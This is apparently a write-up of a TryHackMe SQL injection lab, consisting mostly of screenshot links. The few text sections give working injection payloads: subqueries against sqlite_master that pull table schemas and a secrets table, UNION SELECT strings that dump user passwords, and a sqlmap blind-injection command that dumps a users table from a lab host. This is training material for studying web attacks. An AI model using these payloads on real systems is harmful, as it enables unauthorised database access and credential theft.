# SQL Injection Lab (THM)

### Introduction to SQL Injection: Part 1

![image](https://hackmd.io/_uploads/ry_4Sz1Ua.png)
![image](https://hackmd.io/_uploads/HkLYSfk8a.png)
![image](https://hackmd.io/_uploads/BkoDSz18p.png)
![image](https://hackmd.io/_uploads/Bk4UHMyUp.png)
![image](https://hackmd.io/_uploads/HJqXUMJLp.png)
![image](https://hackmd.io/_uploads/HJ3VLfJ8p.png)
![image](https://hackmd.io/_uploads/rkmf8fJLp.png)
![image](https://hackmd.io/_uploads/B1uHDfkUp.png)
![image](https://hackmd.io/_uploads/rym-wfkUT.png)
![image](https://hackmd.io/_uploads/ByMmPM1Ia.png)
![image](https://hackmd.io/_uploads/B1W0LGy8p.png)
![image](https://hackmd.io/_uploads/BJMiuGJL6.png)
![image](https://hackmd.io/_uploads/ryr9_zy8T.png)
![image](https://hackmd.io/_uploads/SyAEdfJIp.png)

### Introduction to SQL Injection: Part 2

![image](https://hackmd.io/_uploads/HkYQim18a.png)

```
',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='
```

![image](https://hackmd.io/_uploads/S1lCO71U6.png)

```
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
```

![image](https://hackmd.io/_uploads/BkYVtX1LT.png)

```
',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email='
```

![image](https://hackmd.io/_uploads/BySrc71L6.png)

### Vulnerable Startup: Broken Authentication

![image](https://hackmd.io/_uploads/S1SviQ18T.png)
![image](https://hackmd.io/_uploads/SkMjoQJI6.png)
![image](https://hackmd.io/_uploads/ryrLoQ18a.png)

### Vulnerable Startup: Broken Authentication 2

```
' UNION SELECT 1,group_concat(password) FROM users-- -
```

![image](https://hackmd.io/_uploads/SJHCLHg8p.png)
![image](https://hackmd.io/_uploads/SyEHwBlIT.png)
![image](https://hackmd.io/_uploads/rkxT8HeIp.png)
![image](https://hackmd.io/_uploads/BJw7vSe8p.png)

### Vulnerable Startup: Broken Authentication 3 (Blind Injection)

```
sqlmap -u http://10.10.151.38:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b -D SQLite_masterdb -T users --dump
```

![image](https://hackmd.io/_uploads/SJUi5rxLp.png)
![image](https://hackmd.io/_uploads/By6JCBxUp.png)
![image](https://hackmd.io/_uploads/Hyxd0HlUa.png)

### Vulnerable Startup: Vulnerable Notes

```
' union select 1,group_concat(password) from users'
```

![image](https://hackmd.io/_uploads/SkfuD8gUa.png)
![image](https://hackmd.io/_uploads/S1n2PUg8a.png)
![image](https://hackmd.io/_uploads/S1SNOIe8a.png)

### Vulnerable Startup: Change Password

![image](https://hackmd.io/_uploads/BkM0YLxIT.png)
![image](https://hackmd.io/_uploads/BkZLq8eUp.png)

### Vulnerable Startup: Book Title

![image](https://hackmd.io/_uploads/r1Lsj8xUp.png)
![image](https://hackmd.io/_uploads/ryw2sUgL6.png)

### Vulnerable Startup: Book Title 2

```
' UNION SELECT '-1''UNION SELECT 1,2,3,group_concat(password) FROM users-- -
```

![image](https://hackmd.io/_uploads/rkK6TLxLa.png)
![image](https://hackmd.io/_uploads/rk9BgDlIa.png)